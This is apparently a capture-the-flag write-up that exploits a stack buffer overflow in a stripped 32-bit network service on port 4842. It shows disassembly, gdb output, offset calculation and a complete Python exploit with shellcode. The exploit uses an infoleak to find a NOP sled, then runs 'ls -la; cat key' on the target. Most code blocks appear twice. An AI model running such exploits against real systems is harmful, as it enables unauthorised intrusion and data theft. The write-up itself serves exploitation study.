We have an interesting binary that uses signals to call functions. The most interesting handler is the user input handler:
(function names are my own, binary was stripped)
.text:080488C8 inputHandler proc near ; DATA XREF: sub_8048A3D+2Bo
.text:080488C8
.text:080488C8 s = dword ptr -1Ch
.text:080488C8
.text:080488C8 sub esp, 1Ch
.text:080488CB mov [esp+1Ch+s], offset aFBxpSpXpcuav ; "õ+íÕÅÀÞ»+ÕÅûÒÇé"
.text:080488D2 call _puts
.text:080488D7 call readUserInput
.text:080488DC add esp, 1Ch
.text:080488DF retn
.text:080488DF inputHandler endp
.text:080488C8
.text:080488C8 s = dword ptr -1Ch
.text:080488C8
.text:080488C8 sub esp, 1Ch
.text:080488CB mov [esp+1Ch+s], offset aFBxpSpXpcuav ; "õ+íÕÅÀÞ»+ÕÅûÒÇé"
.text:080488D2 call _puts
.text:080488D7 call readUserInput
.text:080488DC add esp, 1Ch
.text:080488DF retn
.text:080488DF inputHandler endp
which call a function to read user input:
.text:0804889E readUserInput proc near ; CODE XREF: inputHandler+Fp
.text:0804889E
.text:0804889E fd = dword ptr -15Ch
.text:0804889E buf = dword ptr -158h
.text:0804889E nbytes = dword ptr -154h
.text:0804889E var_146 = byte ptr -146h
.text:0804889E
.text:0804889E sub esp, 15Ch
.text:080488A4 mov eax, ds:fd
.text:080488A9 mov [esp+15Ch+nbytes], 800h ; nbytes
.text:080488B1 lea edx, [esp+15Ch+var_146]
.text:080488B5 mov [esp+15Ch+buf], edx ; buf
.text:080488B9 mov [esp+15Ch+fd], eax ; fd
.text:080488BC call _read
.text:080488C1 add esp, 15Ch
.text:080488C7 retn
.text:080488C7 readUserInput endp
.text:0804889E
.text:0804889E fd = dword ptr -15Ch
.text:0804889E buf = dword ptr -158h
.text:0804889E nbytes = dword ptr -154h
.text:0804889E var_146 = byte ptr -146h
.text:0804889E
.text:0804889E sub esp, 15Ch
.text:080488A4 mov eax, ds:fd
.text:080488A9 mov [esp+15Ch+nbytes], 800h ; nbytes
.text:080488B1 lea edx, [esp+15Ch+var_146]
.text:080488B5 mov [esp+15Ch+buf], edx ; buf
.text:080488B9 mov [esp+15Ch+fd], eax ; fd
.text:080488BC call _read
.text:080488C1 add esp, 15Ch
.text:080488C7 retn
.text:080488C7 readUserInput endp
Looks like we have a buffer overflow there Lets check it.
$ nc localhost 4842
这部分并ä¸éš¾ï¼Œä½†æˆ‘å¸Œæœ›ä½ æœ‰ä¹è¶£ã€‚å¦‚æžœä½ ç»™æˆ‘å¤§é‡çš„æ•°æ®ï¼Œå®ƒå¯èƒ½æ˜¯ä¸€ä»¶å事会å‘生.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar
这部分并ä¸éš¾ï¼Œä½†æˆ‘å¸Œæœ›ä½ æœ‰ä¹è¶£ã€‚å¦‚æžœä½ ç»™æˆ‘å¤§é‡çš„æ•°æ®ï¼Œå®ƒå¯èƒ½æ˜¯ä¸€ä»¶å事会å‘生.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar
Breakpoint in read and check the stack before the return
db$ stepi
--------------------------------------------------------------------------[regs]
EAX: 0x00000201 EBX: 0x0000595F ECX: 0xBFFFF216 EDX: 0x00000800 o d I t S z a P c
ESI: 0x00000000 EDI: 0xB7FC3FF4 EBP: 0xBFFFF678 ESP: 0xBFFFF35C EIP: 0x080488C7
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0x80488c7: ret
0x80488c8: sub esp,0x1c
0x80488cb: mov DWORD PTR [esp],0x8048e23
0x80488d2: call 0x80486b0 <puts@plt>
0x80488d7: call 0x804889e
0x80488dc: add esp,0x1c
0x80488df: ret
0x80488e0: push edi
--------------------------------------------------------------------------------
0x080488c7 in ?? ()
gdb$ x/8x $esp
0xbffff35c: 0x396b4138 0x41306c41 0x6c41316c 0x336c4132
0xbffff36c: 0x41346c41 0x6c41356c 0x376c4136 0x41386c41
--------------------------------------------------------------------------[regs]
EAX: 0x00000201 EBX: 0x0000595F ECX: 0xBFFFF216 EDX: 0x00000800 o d I t S z a P c
ESI: 0x00000000 EDI: 0xB7FC3FF4 EBP: 0xBFFFF678 ESP: 0xBFFFF35C EIP: 0x080488C7
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0x80488c7: ret
0x80488c8: sub esp,0x1c
0x80488cb: mov DWORD PTR [esp],0x8048e23
0x80488d2: call 0x80486b0 <puts@plt>
0x80488d7: call 0x804889e
0x80488dc: add esp,0x1c
0x80488df: ret
0x80488e0: push edi
--------------------------------------------------------------------------------
0x080488c7 in ?? ()
gdb$ x/8x $esp
0xbffff35c: 0x396b4138 0x41306c41 0x6c41316c 0x336c4132
0xbffff36c: 0x41346c41 0x6c41356c 0x376c4136 0x41386c41
Stack smashed. Calculate buffer length for EIP control:
$ /opt/framework-4.0.0/msf3/tools/pattern_offset.rb 0x396b4138
326
326
Now how can we exploit this buffer overflow to get the key ?
Checking the ELF headers:
$ eu-readelf -l exp300c.txt
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000120 0x000120 R E 0x4
INTERP 0x000154 0x08048154 0x08048154 0x000013 0x000013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00121c 0x00121c R E 0x1000
LOAD 0x001f14 0x0804af14 0x0804af14 0x00015c 0x00016c RW 0x1000
DYNAMIC 0x001f28 0x0804af28 0x0804af28 0x0000c8 0x0000c8 RW 0x4
NOTE 0x000168 0x08048168 0x08048168 0x000044 0x000044 R 0x4
GNU_EH_FRAME 0x000f9c 0x08048f9c 0x08048f9c 0x000094 0x000094 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x000000 0x000000 RWE 0x4
GNU_RELRO 0x001f14 0x0804af14 0x0804af14 0x0000ec 0x0000ec R 0x1
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000120 0x000120 R E 0x4
INTERP 0x000154 0x08048154 0x08048154 0x000013 0x000013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00121c 0x00121c R E 0x1000
LOAD 0x001f14 0x0804af14 0x0804af14 0x00015c 0x00016c RW 0x1000
DYNAMIC 0x001f28 0x0804af28 0x0804af28 0x0000c8 0x0000c8 RW 0x4
NOTE 0x000168 0x08048168 0x08048168 0x000044 0x000044 R 0x4
GNU_EH_FRAME 0x000f9c 0x08048f9c 0x08048f9c 0x000094 0x000094 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x000000 0x000000 RWE 0x4
GNU_RELRO 0x001f14 0x0804af14 0x0804af14 0x0000ec 0x0000ec R 0x1
Stack is RWE! So we will put our shellcode in the buffer (and on the stack) and jump to ip.
To get the right offset on the stack, we will fake parameters push on the stack and call send() to get dump of various memory ranges.
The way I went for it is to write a scanner with this infoleak. It will quickly scan the usual range for the stack (0xbfffffff) until it finds some readable data then i will switch to a more precise scanning and look for the nopsled we have put in front of the shellcode. As soon we have the offset of the nopsled, we switch from infoleak to exploit and jump to the shellcode which dump the content of the key file.
#!/usr/bin/env python
import socket
import sys
import struct
from struct import pack
host = sys.argv[1]
port = 4842
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x17\x00\x00"
shellcode += "\x00\x6c\x73\x20\x2d\x6c\x61\x3e\x26\x34\x20\x3b\x20\x63"
shellcode += "\x61\x74\x20\x6b\x65\x79\x3e\x26\x34\x00\x57\x53\x89\xe1"
shellcode += "\xcd\x80"
def connect_to_host():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(132) # read banner
return s
def exploit(offset):
s = connect_to_host()
payload = ('\x90' * 32) + shellcode
payload += 'A' * (326 - len(payload))
payload += pack("L", offset)
s.send(payload)
data = True
while data:
data = s.recv(1024)
print repr(data)
s.close()
def leak(offset, size):
s = connect_to_host()
off_send = pack("L", 0x08048770)
payload = ('\x90' * 32) + shellcode
payload += 'A' * (326 - len(payload))
payload += off_send
payload += pack('<I', 0x08048813) # exit
payload += pack('<I', 0x4) # fd
payload += pack('<I', offset)
payload += pack('<I', size) # len
payload += pack('<I', 0x40) # flags
s.send(payload)
result = ''
data = True
while data:
data = s.recv(1024)
result += data
s.close()
return result
print "Searching stack..."
off_shellcode_start = 0xbfffffff
data = ''
while data == '' or data == '\x00\x00\x00\x00':
data = leak(off_shellcode_start, 4096)
print "stack offset=", hex(off_shellcode_start), repr(data)
if data == '' or data == '\x00\x00\x00\x00':
off_shellcode_start -= 0xf000
print "Searching shellcode..."
data = ''
while data != '\x90\x90\x90\x90':
data = leak(off_shellcode_start, 4)
print "shellcode offset=", hex(off_shellcode_start), "data=", repr(data)
if data != '\x90\x90\x90\x90':
off_shellcode_start += 8
print "Exploiting at offset", hex(off_shellcode_start)
exploit(off_shellcode_start)
sys.exit(0)
import socket
import sys
import struct
from struct import pack
host = sys.argv[1]
port = 4842
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x17\x00\x00"
shellcode += "\x00\x6c\x73\x20\x2d\x6c\x61\x3e\x26\x34\x20\x3b\x20\x63"
shellcode += "\x61\x74\x20\x6b\x65\x79\x3e\x26\x34\x00\x57\x53\x89\xe1"
shellcode += "\xcd\x80"
def connect_to_host():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(132) # read banner
return s
def exploit(offset):
s = connect_to_host()
payload = ('\x90' * 32) + shellcode
payload += 'A' * (326 - len(payload))
payload += pack("L", offset)
s.send(payload)
data = True
while data:
data = s.recv(1024)
print repr(data)
s.close()
def leak(offset, size):
s = connect_to_host()
off_send = pack("L", 0x08048770)
payload = ('\x90' * 32) + shellcode
payload += 'A' * (326 - len(payload))
payload += off_send
payload += pack('<I', 0x08048813) # exit
payload += pack('<I', 0x4) # fd
payload += pack('<I', offset)
payload += pack('<I', size) # len
payload += pack('<I', 0x40) # flags
s.send(payload)
result = ''
data = True
while data:
data = s.recv(1024)
result += data
s.close()
return result
print "Searching stack..."
off_shellcode_start = 0xbfffffff
data = ''
while data == '' or data == '\x00\x00\x00\x00':
data = leak(off_shellcode_start, 4096)
print "stack offset=", hex(off_shellcode_start), repr(data)
if data == '' or data == '\x00\x00\x00\x00':
off_shellcode_start -= 0xf000
print "Searching shellcode..."
data = ''
while data != '\x90\x90\x90\x90':
data = leak(off_shellcode_start, 4)
print "shellcode offset=", hex(off_shellcode_start), "data=", repr(data)
if data != '\x90\x90\x90\x90':
off_shellcode_start += 8
print "Exploiting at offset", hex(off_shellcode_start)
exploit(off_shellcode_start)
sys.exit(0)
Exploit output:
$ python exploit.py localhost
Searching stack...
stack offset= 0xbfffffffL ''
stack offset= 0xbfff0fffL ''
stack offset= 0xbffe1fffL ''
...
stack offset= 0xbfba9fffL ''
stack offset= 0xbfb9afffL '\x00\x00\x00\x00'
Searching shellcode...
shellcode offset= 0xbfb9afffL data= '\x00\x00\x00\x00'
shellcode offset= 0xbfb9b007L data= '\x00\x00\x00\x00'
...
shellcode offset= 0xbfb9cac7L data= '\xbf\x00\x08\x00'
shellcode offset= 0xbfb9cacfL data= '\x00\x04\x00\x00'
shellcode offset= 0xbfb9cad7L data= '\x90\x90\x90\x90'
Exploiting at offset 0xbfb9cad7L
'total 20\ndrwxr-xr-x 2 liaotian liaotian 4096 Sep 29 00:27 .\ndrwxr-xr-x 14 root root 4096 Sep 29 00:27 ..\n-rw-r--r-- 1 liaotian liaotian 220 Apr 10 2010 .bash_logout\n-rw-r--r-- 1 liaotian liaotian 3184 Apr 10 2010 .bashrc\n-rw-r--r-- 1 liaotian liaotian 675 Apr 10 2010 .profile\n'
Searching stack...
stack offset= 0xbfffffffL ''
stack offset= 0xbfff0fffL ''
stack offset= 0xbffe1fffL ''
...
stack offset= 0xbfba9fffL ''
stack offset= 0xbfb9afffL '\x00\x00\x00\x00'
Searching shellcode...
shellcode offset= 0xbfb9afffL data= '\x00\x00\x00\x00'
shellcode offset= 0xbfb9b007L data= '\x00\x00\x00\x00'
...
shellcode offset= 0xbfb9cac7L data= '\xbf\x00\x08\x00'
shellcode offset= 0xbfb9cacfL data= '\x00\x04\x00\x00'
shellcode offset= 0xbfb9cad7L data= '\x90\x90\x90\x90'
Exploiting at offset 0xbfb9cad7L
'total 20\ndrwxr-xr-x 2 liaotian liaotian 4096 Sep 29 00:27 .\ndrwxr-xr-x 14 root root 4096 Sep 29 00:27 ..\n-rw-r--r-- 1 liaotian liaotian 220 Apr 10 2010 .bash_logout\n-rw-r--r-- 1 liaotian liaotian 3184 Apr 10 2010 .bashrc\n-rw-r--r-- 1 liaotian liaotian 675 Apr 10 2010 .profile\n'
